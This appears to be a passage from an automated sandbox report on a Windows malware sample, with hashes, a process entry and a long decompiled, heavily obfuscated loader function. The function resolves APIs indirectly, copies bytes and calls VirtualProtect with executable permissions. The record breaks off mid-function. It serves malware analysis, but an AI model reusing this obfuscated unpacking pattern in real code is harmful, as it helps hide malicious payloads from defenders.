Opcode Fuzzy Hash: b63c40a153435aee46f1dbaa00f0c7709c3ef757da9a005839b873438a636a49
Instruction Fuzzy Hash: 2951BD73D04504EFEB04DF69D98279EBBB1FF80320F1A85A9C895A7284CB746A10CB95

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 660 Parent PID: 1936 rundll32.exeCOMMON

Executed Functions

Function 03045F16, Relevance: 2.8, APIs: 1, Instructions: 1269
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 75%

			E03045F16(void* __eax, signed int __ebx, void* __ecx, signed int __edx, signed int __esi, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __edi;
				signed int _t610;
				void* _t612;
				signed int _t613;
				intOrPtr _t619;
				void* _t626;
				void* _t628;
				void* _t630;
				signed int _t631;
				signed int _t633;
				signed int _t636;
				signed int _t638;
				void* _t640;
				intOrPtr _t641;
				signed int _t644;
				void* _t646;
				signed int _t647;
				signed int _t650;
				signed int _t652;
				signed int _t653;
				intOrPtr _t656;
				signed int _t658;
				signed int _t661;
				signed int _t665;
				void* _t667;
				signed int _t668;
				signed int _t671;
				signed int _t675;
				signed int _t677;
				void* _t679;
				signed int _t680;
				signed int _t682;
				signed int _t684;
				signed int _t689;
				void* _t691;
				signed int _t692;
				signed int _t698;
				signed int _t701;
				signed int _t706;
				void* _t708;
				intOrPtr _t709;
				signed int _t711;
				void* _t713;
				signed int _t714;
				signed int _t717;
				intOrPtr _t720;
				signed int _t722;
				void* _t724;
				signed int _t726;
				intOrPtr _t729;
				void* _t730;
				signed int _t733;
				void* _t739;
				void* _t741;
				void* _t742;
				signed int _t744;
				void* _t746;
				signed int _t747;
				signed int _t753;
				signed int _t756;
				signed int _t760;
				void* _t762;
				signed int _t767;
				signed int _t771;
				void* _t773;
				void* _t775;
				void* _t776;
				intOrPtr _t778;
				signed int _t781;
				signed int _t785;
				intOrPtr _t788;
				signed int _t791;
				intOrPtr _t794;
				signed int _t797;
				signed int _t813;
				signed int _t816;
				void* _t819;
				signed int _t821;
				signed int _t824;
				void* _t827;
				void* _t828;
				void* _t830;
				signed int _t836;
				signed int _t840;
				signed int _t842;
				signed int _t844;
				signed int _t851;
				signed int _t856;
				signed int _t859;
				signed int _t862;
				signed int _t865;
				signed int _t867;
				signed int _t869;
				signed int _t875;
				signed int _t882;
				void* _t888;
				signed int _t889;
				signed int _t893;
				signed int _t896;
				signed int _t901;
				signed int _t906;
				signed int _t908;
				signed int _t916;
				signed int _t920;
				signed int _t924;
				signed int _t926;
				signed int _t928;
				signed int _t931;
				signed int _t934;
				signed int _t936;
				signed int _t939;
				signed int _t945;
				signed int _t947;
				signed int _t950;
				signed int _t953;
				signed int _t955;
				signed int _t958;
				void* _t966;
				signed int _t969;
				signed int _t975;
				signed int _t977;
				signed int _t979;
				signed int _t981;
				signed int _t986;
				signed int _t987;
				signed int _t1002;
				signed int _t1005;
				signed int _t1009;
				signed int _t1012;
				signed int _t1015;
				signed int _t1018;
				signed int _t1020;
				signed int _t1023;
				signed int _t1026;
				signed int _t1028;
				signed int _t1031;
				signed int _t1034;
				signed int _t1035;
				void* _t1036;
				long _t1041;
				void* _t1043;
				signed int _t1045;
				signed int _t1052;
				signed int _t1054;
				signed int _t1057;
				signed int _t1060;
				signed int _t1063;
				signed int _t1065;
				signed int _t1068;
				void* _t1069;
				signed int _t1071;
				signed int _t1074;
				void* _t1077;
				signed int _t1078;
				signed int _t1081;
				signed int _t1085;
				void* _t1089;
				signed int _t1091;
				void* _t1097;
				void* _t1102;
				signed int _t1103;
				signed int _t1106;
				void* _t1109;
				signed int _t1112;
				signed int _t1119;
				signed int* _t1120;
				signed int* _t1121;
				signed int* _t1122;
				signed int* _t1123;
				signed int* _t1124;
				signed int* _t1125;
				signed int* _t1126;
				signed int* _t1127;
				signed int* _t1128;
				signed int* _t1129;
				signed int* _t1130;
				signed int* _t1131;
				signed int* _t1132;
				signed int* _t1133;
				signed int* _t1134;
				signed int* _t1136;
				signed int* _t1139;
				signed int* _t1140;
				signed int* _t1141;
				signed int* _t1142;
				signed int* _t1143;
				signed int* _t1144;

				_t1063 = __esi;
				_t813 = __ebx;
				_push(__eax);
				 *_t1119 =  *_t1119 & 0x00000000;
				 *_t1119 =  *_t1119 + _t1102;
				_t1103 = _t1119;
				_t1120 = _t1119 + 0xfffffff0;
				_push(_t1103);
				 *_t1120 =  *_t1120 & 0x00000000;
				 *_t1120 =  *_t1120 + __ecx;
				_push(__ecx);
				 *_t1120 =  *_t1120 & 0x00000000;
				 *_t1120 =  *_t1120 ^ __edx;
				_push(_t1103);
				 *_t1120 =  *_t1120 ^ _t1103;
				 *_t1120 =  *_t1120 ^ __ebx + 0x0041cca8;
				_v16 = _v16 & 0x00000000;
				_push(_v16);
				 *_t1120 =  *_t1120 + __ebx + 0x41cd5f;
				_push( *((intOrPtr*)(__ebx + 0x41f068))());
				_pop( *_t7);
				_push(_v16);
				_pop( *_t9);
				_pop( *_t10);
				_t920 = _v16;
				_t1121 = _t1120 - 0xfffffffc;
				_push(__esi);
				 *_t1121 =  *_t1121 ^ __esi;
				 *_t1121 =  *_t1120;
				_push(_v16);
				 *_t1121 = _t920;
				_push(_t1002);
				 *_t1121 =  *_t1121 - _t1002;
				 *_t1121 =  *_t1121 ^ __ebx + 0x0041c01b;
				_t610 =  *((intOrPtr*)(__ebx + 0x41f060))();
				_push(_v16);
				 *_t1121 = _t610;
				_push(__esi);
				 *_t1121 =  *_t1121 & 0x00000000;
				 *_t1121 =  *_t1121 + __ebx + 0x41c678;
				_t612 =  *((intOrPtr*)(__ebx + 0x41f060))();
				_pop( *_t18);
				_push(_t920);
				 *_t20 = _t612;
				_v20 = _v20 + _v20;
				_push(_v20);
				_pop(_t613);
				_v20 = _t613;
				_t836 = 0 ^  *(__ebx + 0x41c55d);
				if(_t836 > _v20) {
					_push(_v12);
					 *_t1121 = __ebx + 0x41c01b;
					_push(_t1103);
					 *_t1121 =  *_t1121 ^ _t1103;
					 *_t1121 =  *_t1121 + __ebx + 0x41c678;
					_push( *((intOrPtr*)(__ebx + 0x41f064))());
					_pop( *_t31);
					_push(_v20);
					_pop( *_t33);
				}
				_pop( *_t34);
				_t924 = _v20;
				 *_t1121 =  *_t1121 & 0x00000000;
				 *_t1121 =  *_t1121 + _t924;
				 *_t1121 =  *_t1121 & 0x00000000;
				 *_t1121 =  *_t1121 | _t813 + 0x0041c8b2;
				 *_t1121 =  *_t1121 & 0x00000000;
				 *_t1121 =  *_t1121 + _t813 + 0x41d167;
				_t619 =  *((intOrPtr*)(_t813 + 0x41f068))(_t924, _t924, _t836);
				_v12 = _t836;
				 *((intOrPtr*)(_t813 + 0x41c883)) = _t619;
				 *_t1121 = _t813 + 0x41c565;
				_v12 = 0;
				 *_t1121 =  *_t1121 | _t813 + 0x0041c574;
				_push( *((intOrPtr*)(_t813 + 0x41f060))(_v12, _v20));
				_pop( *_t48);
				_push(_v20);
				_pop( *_t50);
				_pop( *_t51);
				 *_t1121 =  *_t1121 - _t1103;
				 *_t1121 =  *_t1121 ^ _v20;
				 *_t1121 =  *_t1121 ^ _t813;
				 *_t1121 =  *_t1121 + _t813 + 0x41cd20;
				_push( *((intOrPtr*)(_t813 + 0x41f060))(_t813, _t1103));
				_pop( *_t55);
				_push(_v16);
				_pop( *_t57);
				_t626 =  *((intOrPtr*)(_t813 + 0x41f060))();
				_v16 = _v16 & 0x00000000;
				 *_t1121 =  *_t1121 + _t626;
				_v16 = _v16 & 0x00000000;
				 *_t1121 =  *_t1121 + _t813 + 0x41c3ee;
				_t628 =  *((intOrPtr*)(_t813 + 0x41f060))(_v16, _v16);
				 *_t1121 =  *_t1121 ^ _t924;
				 *_t1121 =  *_t1121 + _t628;
				_v12 = _v12 & 0x00000000;
				 *_t1121 =  *_t1121 | _t813 + 0x0041cfe9;
				_t630 =  *((intOrPtr*)(_t813 + 0x41f060))(_v12, _t924);
				_pop( *_t72);
				_t840 = _v20;
				 *_t74 = _t630;
				_v20 = _v20 + _t840;
				_push(_v20);
				_pop(_t631);
				_t1065 = _t1063;
				_t842 = _t840 & 0x00000000 | _t1103 & 0x00000000 ^  *(_t813 + 0x41ca09);
				_t1106 = _t1103;
				if(_t842 > _t631) {
					 *_t1121 =  *_t1121 & 0x00000000;
					 *_t1121 =  *_t1121 + _t813 + 0x41c3ee;
					 *_t1121 = _t813 + 0x41cfe9;
					_t631 =  *((intOrPtr*)(_t813 + 0x41f064))(_v12, _t813);
					_push(_t924);
					 *(_t813 + 0x41c365) =  *(_t813 + 0x41c365) & 0x00000000;
					 *(_t813 + 0x41c365) =  *(_t813 + 0x41c365) ^ _t924 & 0x00000000 ^ _t631;
				}
				_t633 = _t631 & 0x00000000 ^  *_t1121;
				_t1122 =  &(_t1121[1]);
				 *_t1122 = _t1002;
				 *(_t813 + 0x41d240) = _t633;
				_t1005 = 0;
				_pop( *_t88);
				_t926 = 0 ^ _v20;
				_pop( *_t90);
				_t844 = _t842 & 0x00000000 ^ _v16;
				 *_t1122 =  *_t1122 & 0x00000000;
				 *_t1122 =  *_t1122 ^ _t926;
				 *_t1122 =  *_t1122 & 0x00000000;
				 *_t1122 =  *_t1122 | _t844;
				 *_t1122 =  *_t1122 & 0x00000000;
				 *_t1122 =  *_t1122 ^ _t813 + 0x0041c624;
				_v12 = _v12 & 0x00000000;
				 *_t1122 =  *_t1122 ^ _t813 + 0x0041d36b;
				_t636 =  *((intOrPtr*)(_t813 + 0x41f068))(_v12, _t926, _t1005, _t633);
				 *(_t813 + 0x41c655) =  *(_t813 + 0x41c655) & 0x00000000;
				 *(_t813 + 0x41c655) =  *(_t813 + 0x41c655) | _t844 -  *_t1122 ^ _t636;
				_t1123 =  &(_t1122[1]);
				_v16 = _v16 & 0x00000000;
				 *_t1123 =  *_t1123 ^  *_t1122;
				_v16 = 0;
				 *_t1123 =  *_t1123 ^ _t813 + 0x0041c891;
				_t638 =  *((intOrPtr*)(_t813 + 0x41f060))(_v16, _v16, _t844);
				 *_t1123 =  *_t1123 - _t1106;
				 *_t1123 =  *_t1123 | _t638;
				_v12 = 0;
				 *_t1123 =  *_t1123 ^ _t813 + 0x0041c30f;
				_t640 =  *((intOrPtr*)(_t813 + 0x41f060))(_v12, _t1106);
				_t851 =  *_t1123;
				_t1124 =  &(_t1123[1]);
				 *_t113 = _t640;
				_v16 = _v16 + _t851;
				_push(_v16);
				_pop(_t641);
				_t928 = _t926;
				_v16 = _t1005;
				if((_t851 & 0x00000000 | _t1005 ^ _v16 |  *(_t813 + 0x41ca38)) > _t641) {
					_v20 = _v20 & 0x00000000;
					 *_t1124 =  *_t1124 | _t813 + 0x0041c891;
					_v12 = 0;
					 *_t1124 =  *_t1124 + _t813 + 0x41c30f;
					_t641 =  *((intOrPtr*)(_t813 + 0x41f064))(_v12, _v20);
				}
				 *_t1124 = _t928;
				 *((intOrPtr*)(_t813 + 0x41c910)) = _t641;
				_t931 = 0;
				_v12 = _t1065;
				_t1068 = _v12;
				_v12 = 0;
				 *_t1124 =  *_t1124 | 0 ^ _a4;
				_v16 = 0;
				 *_t1124 =  *_t1124 | _t813 + 0x0041c9ef;
				_t644 =  *((intOrPtr*)(_t813 + 0x41f060))(_v16, _v12);
				_v12 = 0;
				 *_t1124 =  *_t1124 ^ _t644;
				 *_t1124 = _t813 + 0x41cb65;
				_t646 =  *((intOrPtr*)(_t813 + 0x41f060))(_v20, _v12);
				_t1125 =  &(_t1124[1]);
				_v12 = _t931;
				_push( *_t1124 + _t646);
				_t934 = _v12;
				_pop(_t647);
				_v12 = _t647;
				_t856 = 0 ^  *(_t813 + 0x41c187);
				_t650 = _v12;
				if(_t856 > _t650) {
					_v20 = 0;
					 *_t1125 =  *_t1125 | _t813 + 0x0041c9ef;
					 *_t1125 =  *_t1125 ^ _t856;
					 *_t1125 =  *_t1125 + _t813 + 0x41cb65;
					_t650 =  *((intOrPtr*)(_t813 + 0x41f064))(_t856, _v20);
					_v16 = _t1068;
					 *(_t813 + 0x41c651) =  *(_t813 + 0x41c651) & 0x00000000;
					 *(_t813 + 0x41c651) =  *(_t813 + 0x41c651) | _t1068 ^ _v16 | _t650;
					_t1068 = _v16;
				}
				_t652 = _t650 & 0x00000000 ^  *_t1125;
				_t1126 = _t1125 - 0xfffffffc;
				 *_t162 = _t652;
				_v16 = _v16 +  *((intOrPtr*)(_t652 + 0x3c));
				_push(_v16);
				_pop(_t653);
				_t936 = _t934;
				 *_t1126 = _t653;
				 *_t1126 =  *_t1126 & 0x00000000;
				 *_t1126 =  *_t1126 ^ _t813 + 0x0041c16e;
				 *_t1126 = _t813 + 0x41ce8a;
				_t656 =  *((intOrPtr*)(_t813 + 0x41f068))(_v20, _t1068, _v20);
				 *_t1126 = _t1106;
				 *((intOrPtr*)(_t813 + 0x41c0cc)) = _t656;
				_t1109 = 0;
				_t658 =  *_t1126;
				_t1127 =  &(_t1126[1]);
				 *_t1127 = _t658;
				 *_t1127 =  *_t1127 - _t856;
				 *_t1127 =  *_t1127 ^ _t658;
				 *_t1127 =  *_t1127 - _t936;
				 *_t1127 =  *_t1127 + _t813 + 0x41c791;
				_v12 = _v12 & 0x00000000;
				 *_t1127 =  *_t1127 ^ _t813 + 0x0041ca02;
				_t661 =  *((intOrPtr*)(_t813 + 0x41f068))(_v12, _t936, _t856, _v16);
				 *_t1127 = _t936;
				 *(_t813 + 0x41c9e0) = 0 ^ _t661;
				_t939 = 0;
				_t1128 = _t1127 - 0xfffffffc;
				_v20 = _t813;
				_t1009 =  *_t1127;
				_t816 = _v20;
				_v12 = 0;
				 *_t1128 =  *_t1128 | _t816 + 0x0041c000;
				_t665 =  *((intOrPtr*)(_t816 + 0x41f060))(_v12);
				 *_t1128 =  *_t1128 ^ _t1009;
				 *_t1128 = _t665;
				 *_t1128 =  *_t1128 - _t1009;
				 *_t1128 =  *_t1128 ^ _t816 + 0x0041cc73;
				_t667 =  *((intOrPtr*)(_t816 + 0x41f060))(_t1009, _t1009);
				_t1129 =  &(_t1128[1]);
				 *_t1129 =  *_t1129 ^ _t1068;
				_t1069 = _t667;
				_t668 = _t1069 + (_t856 & 0x00000000 |  *_t1128);
				_t1071 = 0;
				_v20 = _t1009;
				_t859 = 0 ^  *(_t816 + 0x41c250);
				_t1012 = _v20;
				if(_t859 > _t668) {
					 *_t1129 =  *_t1129 - _t1012;
					 *_t1129 =  *_t1129 ^ _t816 + 0x0041c000;
					_v12 = 0;
					 *_t1129 =  *_t1129 | _t816 + 0x0041cc73;
					_t668 =  *((intOrPtr*)(_t816 + 0x41f064))(_v12, _t1012);
				}
				 *(_t816 + 0x41c695) =  *(_t816 + 0x41c695) & 0x00000000;
				 *(_t816 + 0x41c695) =  *(_t816 + 0x41c695) | _t859 & 0x00000000 ^ _t668;
				_t862 = _t859;
				 *_t1129 =  *_t1129 - _t1071;
				 *_t1129 =  *_t1129 + ( *(_t1012 + 6) & 0x0000ffff);
				 *_t1129 = _t816 + 0x41ca88;
				_t671 =  *((intOrPtr*)(_t816 + 0x41f060))(_v12, _t1071);
				_v20 = _t862;
				 *(_t816 + 0x41d151) =  *(_t816 + 0x41d151) & 0x00000000;
				 *(_t816 + 0x41d151) =  *(_t816 + 0x41d151) | _t862 ^ _v20 ^ _t671;
				_t865 = _v20;
				_pop( *_t211);
				_v8 = _v8 & 0x00000000;
				_v8 = _v8 ^ (_t816 & 0x00000000 | 0 ^ _v16);
				_t819 = _t816;
				 *_t1129 =  *_t1129 & 0x00000000;
				 *_t1129 =  *_t1129 ^ _t819 + 0x0041c863;
				_t675 =  *((intOrPtr*)(_t819 + 0x41f060))(_t819);
				 *(_t819 + 0x41c2ac) =  *(_t819 + 0x41c2ac) & 0x00000000;
				 *(_t819 + 0x41c2ac) =  *(_t819 + 0x41c2ac) | _t1109 -  *_t1129 ^ _t675;
				_t1112 = _t1109;
				 *_t1129 =  *_t1129 - _t865;
				 *_t1129 =  *_t1129 ^ _t1012;
				 *_t1129 = _t819 + 0x41ca0d;
				_t677 =  *((intOrPtr*)(_t819 + 0x41f060))(_v12, _t865);
				 *_t1129 = _t677;
				 *_t1129 = _t819 + 0x41cbe6;
				_t679 =  *((intOrPtr*)(_t819 + 0x41f060))(_v12, _v20);
				_t867 =  *_t1129;
				_t1130 = _t1129 - 0xfffffffc;
				 *_t230 = _t679;
				_v16 = _v16 + _t867;
				_push(_v16);
				_pop(_t680);
				_t821 = _t819;
				_t869 = _t867 & 0x00000000 | _t1071 & 0x00000000 ^  *(_t821 + 0x41d053);
				_t1074 = _t1071;
				if(_t869 > _t680) {
					_t235 = _t821 + 0x41ca0d; // 0x41ca0d
					_v12 = 0;
					 *_t1130 =  *_t1130 | _t235;
					_t238 = _t821 + 0x41cbe6; // 0x41cbe6
					 *_t1130 =  *_t1130 & 0x00000000;
					 *_t1130 =  *_t1130 + _t238;
					_t680 =  *((intOrPtr*)(_t821 + 0x41f064))(_t1074, _v12);
				}
				 *_t1130 = _t1012;
				 *(_t821 + 0x41c918) = 0 ^ _t680;
				_t1015 = 0;
				_v16 = _t869;
				_v16 = 0;
				 *_t1130 =  *_t1130 + (_t939 & 0x00000000 | _t869 ^ _v16 |  *(_t1015 + 0x54));
				_t247 = _t821 + 0x41d093; // 0x41d093
				 *_t1130 =  *_t1130 & 0x00000000;
				 *_t1130 =  *_t1130 | _t247;
				_t682 =  *((intOrPtr*)(_t821 + 0x41f060))(_v16);
				 *_t1130 = _t1015;
				 *(_t821 + 0x41c4f0) = 0 ^ _t682;
				_t1018 = 0;
				 *_t250 = _t821;
				_t1020 = _t1018 & 0x00000000 ^ (_t1074 ^  *_t1130 |  *(_t821 + 0x41c166));
				_t1077 = _t1074;
				 *_t1130 =  *_t1130 & 0x00000000;
				 *_t1130 =  *_t1130 ^ _v16;
				_t253 = _t821 + 0x41cfd9; // 0x41cfd9
				_v20 = 0;
				 *_t1130 =  *_t1130 | _t253;
				_t684 =  *((intOrPtr*)(_t821 + 0x41f060))(_v20, _t1077);
				_v20 = _t1020;
				 *(_t821 + 0x41c323) =  *(_t821 + 0x41c323) & 0x00000000;
				 *(_t821 + 0x41c323) =  *(_t821 + 0x41c323) | _t1020 ^ _v20 ^ _t684;
				_t1023 = _v20;
				_t1131 =  &(_t1130[1]);
				 *_t1131 = _t684;
				_t1078 = _a4;
				_v12 = _v12 & 0x00000000;
				 *_t1131 =  *_t1131 |  *_t1130;
				_t268 = _t821 + 0x41ca9e; // 0x41ca9e
				_v12 = _v12 & 0x00000000;
				 *_t1131 =  *_t1131 | _t268;
				_t689 =  *((intOrPtr*)(_t821 + 0x41f060))(_v12, _v12, 0);
				 *_t1131 =  *_t1131 & 0x00000000;
				 *_t1131 =  *_t1131 | _t689;
				_t273 = _t821 + 0x41c931; // 0x41c931
				 *_t1131 =  *_t1131 & 0x00000000;
				 *_t1131 =  *_t1131 | _t273;
				_t691 =  *((intOrPtr*)(_t821 + 0x41f060))(_v16);
				 *_t275 = _t1023;
				_v20 = _t821;
				_push(0 + _v16 + _t691);
				_t824 = _v20;
				_pop(_t692);
				_push( *((intOrPtr*)(_t824 + 0x41cccf)));
				_pop( *_t280);
				_push(_v12);
				_pop(_t875);
				if(_t875 > _t692) {
					 *_t1131 = _t824 + 0x41ca9e;
					 *_t1131 =  *_t1131 & 0x00000000;
					 *_t1131 =  *_t1131 ^ _t824 + 0x0041c931;
					_t692 =  *((intOrPtr*)(_t824 + 0x41f064))(_t1078, _v16);
					 *_t286 = _t692;
					_push(_v16);
					_pop( *_t288);
				}
				_pop( *_t289);
				_t945 = _v12;
				_v12 = _t692;
				 *_t1131 = _t875 & 0x00000000 | _t692 ^ _v12 | _t945;
				 *_t1131 =  *_t1131 ^ _t824;
				 *_t1131 =  *_t1131 + _t945;
				_v12 = 0;
				 *_t1131 =  *_t1131 ^ _t824 + 0x0041d1ba;
				 *_t1131 = _t824 + 0x41c856;
				_t698 =  *((intOrPtr*)(_t824 + 0x41f068))(_v16, _v12, _t824, _v12);
				_v20 = _t1078;
				 *(_t824 + 0x41c0c8) = 0 ^ _t698;
				_t1081 = _v20;
				_pop( *_t304);
				_t947 = 0 ^ _v20;
				_t879 = 0 ^  *_t1131;
				_t1132 = _t1131 - 0xfffffffc;
				if(_t1023 != _t1081) {
					 *_t1132 =  *_t1132 - _t1023;
					 *_t1132 =  *_t1132 ^ _t879;
					_v20 = _v20 & 0x00000000;
					 *_t1132 =  *_t1132 + _t947;
					_v16 = 0;
					 *_t1132 =  *_t1132 ^ _t824 + 0x0041c7a9;
					_t739 =  *((intOrPtr*)(_t824 + 0x41f060))(_v16, _v20, _t1023);
					_v12 = 0;
					 *_t1132 =  *_t1132 + _t739;
					 *_t1132 =  *_t1132 & 0x00000000;
					 *_t1132 =  *_t1132 ^ _t824 + 0x0041d026;
					_t741 =  *((intOrPtr*)(_t824 + 0x41f060))(_t824, _v12);
					_t1139 = _t1132 - 0xfffffffc;
					 *_t317 = _t741;
					_v20 = _v20 + (_t879 & 0x00000000) +  *_t1132;
					_push(_v20);
					_pop(_t742);
					_t1045 = _t1023;
					_push(0);
					 *_t1139 = _t1045;
					_t906 = 0 ^  *(_t824 + 0x41c244);
					if(_t906 > _t742) {
						 *_t1139 =  *_t1139 ^ _t906;
						 *_t1139 =  *_t1139 | _t824 + 0x0041c7a9;
						 *_t1139 =  *_t1139 & 0x00000000;
						 *_t1139 =  *_t1139 + _t824 + 0x41d026;
						_t797 =  *((intOrPtr*)(_t824 + 0x41f064))(_t824, _t906);
						_push(0);
						 *_t1139 = _t947;
						 *(_t824 + 0x41cf47) = 0 ^ _t797;
					}
					_pop( *_t326);
					_t969 = _v12;
					_t908 =  *_t1139;
					_t1140 = _t1139 - 0xfffffffc;
					do {
						asm("movsb");
						_v12 = 0;
						 *_t1140 =  *_t1140 + _t908;
						_v12 = _v12 & 0x00000000;
						 *_t1140 =  *_t1140 + _t969;
						 *_t1140 =  *_t1140 - _t969;
						 *_t1140 =  *_t1140 | _t824 + 0x0041c831;
						_t744 =  *((intOrPtr*)(_t824 + 0x41f060))(_t969, _v12, _v12);
						 *_t1140 =  *_t1140 ^ _t1112;
						 *_t1140 =  *_t1140 ^ _t744;
						 *_t1140 =  *_t1140 & 0x00000000;
						 *_t1140 =  *_t1140 ^ _t824 + 0x0041c7fa;
						_t746 =  *((intOrPtr*)(_t824 + 0x41f060))(_t1081, _t1112);
						_t1141 =  &(_t1140[1]);
						 *_t337 = _t746;
						_v20 = _v20 +  *_t1140;
						_push(_v20);
						_pop(_t747);
						_t1081 = _t1081;
						_v12 = _t747;
						if((0 ^  *(_t824 + 0x41c054)) > _v12) {
							 *_t1141 = _t824 + 0x41c831;
							 *_t1141 = _t824 + 0x41c7fa;
							_t794 =  *((intOrPtr*)(_t824 + 0x41f064))(_v16, _v16);
							_v16 = _t969;
							 *((intOrPtr*)(_t824 + 0x41c254)) = _t794;
						}
						_pop( *_t352);
						_t969 = 0 + _v12;
						_t1140 = _t1141 - 0xfffffffc;
						_t908 =  *_t1141 - 1;
					} while (_t908 != 0);
					 *_t1140 =  *_t1140 & 0x00000000;
					 *_t1140 =  *_t1140 ^ _t969;
					 *_t1140 =  *_t1140 & 0x00000000;
					 *_t1140 =  *_t1140 ^ _t824 + 0x0041ccd3;
					_v20 = 0;
					 *_t1140 =  *_t1140 ^ _t824 + 0x0041c339;
					_t753 =  *((intOrPtr*)(_t824 + 0x41f068))(_v20, _t908, _t908);
					 *(_t824 + 0x41d2bf) =  *(_t824 + 0x41d2bf) & 0x00000000;
					 *(_t824 + 0x41d2bf) =  *(_t824 + 0x41d2bf) ^ _t969 ^  *_t1140 ^ _t753;
					_t975 =  *_t1140;
					_t1142 = _t1140 - 0xfffffffc;
					_v12 = _t753;
					_t756 = _v12;
					 *_t1142 =  *_t1142 ^ _t756;
					 *_t1142 =  *_t1142 ^ _t975;
					_v20 = _v20 & 0x00000000;
					 *_t1142 =  *_t1142 ^ _t824 + 0x0041c8b7;
					_push( *((intOrPtr*)(_t824 + 0x41f060))(_v20, _t756, _t969));
					_pop( *_t371);
					_push(_v16);
					_pop( *_t373);
					_pop( *_t374);
					_t977 = _t975 & 0x00000000 ^ _v16;
					 *(_t824 + 0x41c60a) = 0x40;
					 *_t1142 = _t977;
					_v16 = 0;
					 *_t1142 =  *_t1142 ^ _t824 + 0x0041c4cb;
					_t760 =  *((intOrPtr*)(_t824 + 0x41f060))(_v16, _v20);
					 *_t1142 = _t760;
					 *_t1142 = _t824 + 0x41c438;
					_t762 =  *((intOrPtr*)(_t824 + 0x41f060))(_v16, _v12);
					_pop( *_t386);
					 *_t1142 =  *_t1142 | _t824;
					_t830 = _t762;
					_t824 = 0;
					_v16 =  *((intOrPtr*)(_t824 + 0x41c166));
					_t916 =  *(_t824 + 0x41d118);
					_t1052 = _v16;
					if(_t916 > _t830 + _v20 + (_t908 & 0x00000000)) {
						_t391 = _t824 + 0x41c4cb; // 0x41c4cb
						 *_t1142 =  *_t1142 - _t916;
						 *_t1142 =  *_t1142 + _t391;
						_t392 = _t824 + 0x41c438; // 0x41c438
						 *_t1142 =  *_t1142 ^ _t977;
						 *_t1142 =  *_t1142 | _t392;
						_t791 =  *((intOrPtr*)(_t824 + 0x41f064))(_t977, _t916);
						_v20 = _t977;
						 *(_t824 + 0x41c583) =  *(_t824 + 0x41c583) & 0x00000000;
						 *(_t824 + 0x41c583) =  *(_t824 + 0x41c583) | _t977 - _v20 ^ _t791;
					}
					_t979 =  *_t1142;
					_t1143 = _t1142 - 0xfffffffc;
					_t401 = _t824 + 0x41c60a; // 0x41c60a
					 *_t1143 =  *_t1143 - _t979;
					 *_t1143 =  *_t1143 ^ _t401;
					 *_t1143 = _t979;
					_t403 = _t824 + 0x41cb46; // 0x41cb46
					 *_t1143 =  *_t1143 & 0x00000000;
					 *_t1143 =  *_t1143 + _t403;
					_t404 = _t824 + 0x41c91c; // 0x41c91c
					 *_t1143 = _t404;
					_t767 =  *((intOrPtr*)(_t824 + 0x41f068))(_v20, _t824, _v16, _t979);
					 *_t1143 = _t1081;
					 *(_t824 + 0x41cf40) = 0 ^ _t767;
					_t1097 = 0;
					_t981 =  *_t1143;
					_t1144 =  &(_t1143[1]);
					_pop( *_t408);
					 *_t1144 =  *_t1144 & 0x00000000;
					 *_t1144 =  *_t1144 + (0 ^ _v20);
					 *_t1144 = _t981;
					_t411 = _t824 + 0x41cc6e; // 0x41cc6e
					 *_t1144 = _t411;
					_t771 =  *((intOrPtr*)(_t824 + 0x41f060))(_v16, _v16, _t916);
					 *(_t824 + 0x41c082) =  *(_t824 + 0x41c082) & 0x00000000;
					 *(_t824 + 0x41c082) =  *(_t824 + 0x41c082) ^ _t981 & 0x00000000 ^ _t771;
					 *_t418 = _t981;
					_t986 = _v12;
					 *_t1144 = 2;
					_v12 = _v12 & 0x00000000;
					 *_t1144 =  *_t1144 ^ _t986;
					_t423 = _t824 + 0x41cfff; // 0x41cfff
					 *_t1144 =  *_t1144 & 0x00000000;
					 *_t1144 =  *_t1144 ^ _t423;
					_t773 =  *((intOrPtr*)(_t824 + 0x41f060))(_t1112, _v12, _t824);
					 *_t1144 =  *_t1144 & 0x00000000;
					 *_t1144 =  *_t1144 + _t773;
					_t425 = _t824 + 0x41c3b9; // 0x41c3b9
					 *_t1144 =  *_t1144 - _t1112;
					 *_t1144 =  *_t1144 | _t425;
					_t775 =  *((intOrPtr*)(_t824 + 0x41f060))(_t1112, _t986);
					_t1132 =  &(_t1144[1]);
					 *_t427 = _t775;
					_v20 = _v20 + (_t916 & 0x00000000 |  *_t1144);
					_push(_v20);
					_pop(_t776);
					_t1054 = _t1052;
					 *_t1132 = _t1054;
					_t879 =  *(_t824 + 0x41d0fa);
					_t1057 = 0;
					if(_t879 > _t776) {
						_t432 = _t824 + 0x41cfff; // 0x41cfff
						 *_t1132 =  *_t1132 - _t1112;
						 *_t1132 =  *_t1132 + _t432;
						_t433 = _t824 + 0x41c3b9; // 0x41c3b9
						 *_t1132 =  *_t1132 ^ _t1112;
						 *_t1132 =  *_t1132 + _t433;
						_t788 =  *((intOrPtr*)(_t824 + 0x41f064))(_t1112, _t1112);
						_v12 = _t1097;
						 *((intOrPtr*)(_t824 + 0x41d019)) = _t788;
						_t1097 = _v12;
					}
					_pop( *_t438);
					_t987 = _v12;
					 *_t1132 =  *_t1132 ^ _t824;
					 *_t1132 = _t987;
					_t440 = _t824 + 0x41c42d; // 0x41c42d
					 *_t1132 =  *_t1132 - _t1097;
					 *_t1132 =  *_t1132 + _t440;
					_t778 =  *((intOrPtr*)(_t824 + 0x41f060))(_t1097, _t824);
					 *_t1132 = _t1057;
					 *((intOrPtr*)(_t824 + 0x41c664)) = _t778;
					_t1060 = 0;
					_v16 = _v16 & 0x00000000;
					 *_t1132 =  *_t1132 + _t1060;
					_t446 = _t824 + 0x41c4b9; // 0x41c4b9
					_v12 = 0;
					 *_t1132 =  *_t1132 + _t446;
					_t449 = _t824 + 0x41c298; // 0x41c298
					 *_t1132 =  *_t1132 ^ _t1097;
					 *_t1132 = _t449;
					_t781 =  *((intOrPtr*)(_t824 + 0x41f068))();
					_v16 = _t987;
					 *(_t824 + 0x41c405) = 0 ^ _t781;
					_t947 = _v16;
					VirtualProtect(_t1097, _v12, _v16, ??);
					_t455 = _t824 + 0x41c772; // 0x41c772
					_v20 = 0;
					 *_t1132 =  *_t1132 ^ _t455;
					_t458 = _t824 + 0x41cb5c; // 0x41cb5c
					 *_t1132 =  *_t1132 ^ _t824;
					 *_t1132 =  *_t1132 | _t458;
					_t785 =  *((intOrPtr*)(_t824 + 0x41f068))(_t824, _v20);
					_v12 = _t1060;
